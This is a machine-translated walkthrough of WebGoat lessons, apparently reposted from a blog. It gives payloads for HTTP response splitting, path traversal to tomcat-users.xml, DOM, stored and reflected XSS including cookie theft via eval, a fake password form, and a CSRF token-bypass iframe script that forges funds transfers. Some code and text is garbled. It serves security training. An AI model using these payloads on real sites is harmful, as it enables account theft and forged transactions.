Webgoat Topic solution (GENERAL~XSS)

Source: Internet
Author: User

general*************************************************************

1. Http spliting
Step1

Cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0acontent-type:%20text/html%0acontent-length:30%0a

Step2
Add the last-modified header, set the expiration time of the server page, and note the format of the date.

cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0alast-modified:%20thu,%2001%20jan%204099%2012:00:00%20gmt% 20%20%20%0acontent-type:%20text/html%0acontent-length:30%0a


Access Control flaws**************************************************

1. Bypass a Path Based Access Control Scheme

.. /.. /.. /.. /.. /.. /.. /etc/tomcat6/tomcat-users.xml

Currently in the number of levels directory, there are how many: You can go to the root directory.

AJAX security*********************************************************
1, lab:dom-based cross-site scripting
Step1

</img>

Submit
Step2

</img> onMouseOver ...

<a onclick= "Javascript:alert (/xss/)" >haha</a>

Onmouseover/onmouseout ...

<a onclick= "Javascript:eval (document.location.href= ' http://www.baidu.com ')" >haha</a>

Step3

<iframe src= "Javascript:alert (/xss/)" ></iframe>

Step4

Please enter your password:<br><input type= "password" id= "passwd" ><br><button onclick= " Javascript:alert (' I Have your password: ' + pass.value); " >Submit</button>

Can customs clearance, but Pass.value will error.
Step5
Edit/owaspbwa/webgoat-svn/target/webgoat-5.4+svn/javascript/domxss.js to add the escapehtml function to name.

function displaygreeting (name) {if (name! = ") {document.getElementById (" greeting "). Innerhtml=" Hel Lo, "+ escapehtml (name);        + "!"; }

After encoding, it becomes

2, Lab:client Side Filtering
Step1
By crawling Ajax data with WebScarab, you can find data for 12 employees.
3. XML Injection
4. JSON Injection
Use WebScarab to crawl XML, JSON data directly to modify.
5, Silent transactions Attacks
Analyze the script code to know that Ajax calls SubmitData (Accountno, balance) function transfer, you can call this function directly to transfer money. In the browser input:

Javascript:submitdata (666,10000)

6. Dangerous use of Eval

123 "'); alert (document.cookie);//

Alert (' whoops:you entered an incorrect access code of "123" '); alert (document.cookie);/"';
7, Insecure Client Storage
Step1
Firebug Debug Clientsidevalidation.js, set a breakpoint at 42 line return Caesar, run continuously to discover all coupon code:
Platinum Gold Pressone Presstuo
Enter any one to pass
Step2
Using WebScarab to crawl the Ajax return package, the modified return value is 0 to complete.

Authentication flaws*************************************************************
1. Basic Authentication
Step1
View the request header to know.
Step2
1. Use WebScarab to remove authentication headers and cookies (you must also delete these two).
2. Log in with Basic:basic in the returned login box.
3, delete the value of the cookie at this time, that is, return a brand-new webgoat.
4. Choose this course to pass.
2. Multi Level Login 2
Log in as Joe/banana and enter the specified tan to inquire about your information. At this point, the value of Hidden_user to send the request through WebScarab is Jane.
3. Multi level Login 1
Ditto, modify the value of the Hidden_tan.

Buffer overflows********************************************************************

1, Off-by-one overflows
Use Burpsuite injection.

Code quality*************************************************************************

1. Discover Clues in the HTML
View HTML source code, search <! can find:
<!--fixme ADMIN:ADMINPW--><!--use admin to regenerate database--

Cross-site Scripting (XSS) ***********************************************************

1. Phishing with XSS
To construct form forms:

 </form><br><br><br>

     Through the proxy can you see that http://xx.xx.xx.xx/webgoat/Catcher is actually sent to the server? Property=yes&user=xx&password=xx&submit=login request, but the requested content does not exist!!!!!!!
2, Lab:cross Site Scripting
    step1
         Edit Tom's profile, Modify the street section to: <script>alert (/xss/) <script>, and then use Jerry Login to view Tom's profile to complete the course. You can also modify other fields.
    step3
3, Stored XSS Attacks
     Enter <script>alert in the message box (/xss/) </script> can.
4, reflected XSS Attacks
     Observe that Updatecart purchase all submit data with post, but enter your credit card number: and enter your three digit access code: The value is returned as it was post, so you can construct JS in
     here. <script>alert (/xss/) </script>
5, Cross Site Request forgery (CSRF)
     XSS with stored     

6, CSRF Prompt By-Pass

7, CSRF Token by-pass
    a, open the Funds Transfer page: Add transferfunds=main parameters after the URL.
    b, view page source code, found: <input type= "hidden" value= " -953910496" name= "Csrftoken";
    c, tectonic payload. The key is to first add the parameters Transferfunds=main Open the transfer page to get the Csrftoken of the page.
    

<script>    var tokenvalue;    function readframe1 ()     {    var framedoc = document.getelementbyid ("Frame1 "). Contentdocument;    var form = framedoc.getelementsbytagname (" form ") [1];     var token = form. csrftoken.value;    tokenvalue =  ' &csrftoken= ' +token;     loadframe2 ();     }    function loadframe2 ()      {    var testframe = document.getelementbyid ("frame2");     testframe.src= "Http://xx.xx.xx.xx/WebGoat/attack? screen=838&menu=900&transferfunds=4000 "+tokenvalue;    } </script>     <iframe src= "Http://xx.xx.xx.xx/WebGoat/attack? Screen=838&menu=900&transferfunds=main"    onload=" readFrame1 (); "     id= "Frame1"  frameborder= "1"  marginwidth= "0"      marginheight= "0"  width= "1"  scrolling=yes height= "1" ></iframe>     <iframe id= "Frame2"  frameborder= "1"  marginwidth= "0"     marginheight= "0"  width= "1"  scrolling=yes height= "1" ></iframe>


This article is from the "Technology No Peak" blog, please be sure to keep this source http://shelia.blog.51cto.com/2930476/1626479

Webgoat Topic solution (GENERAL~XSS)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.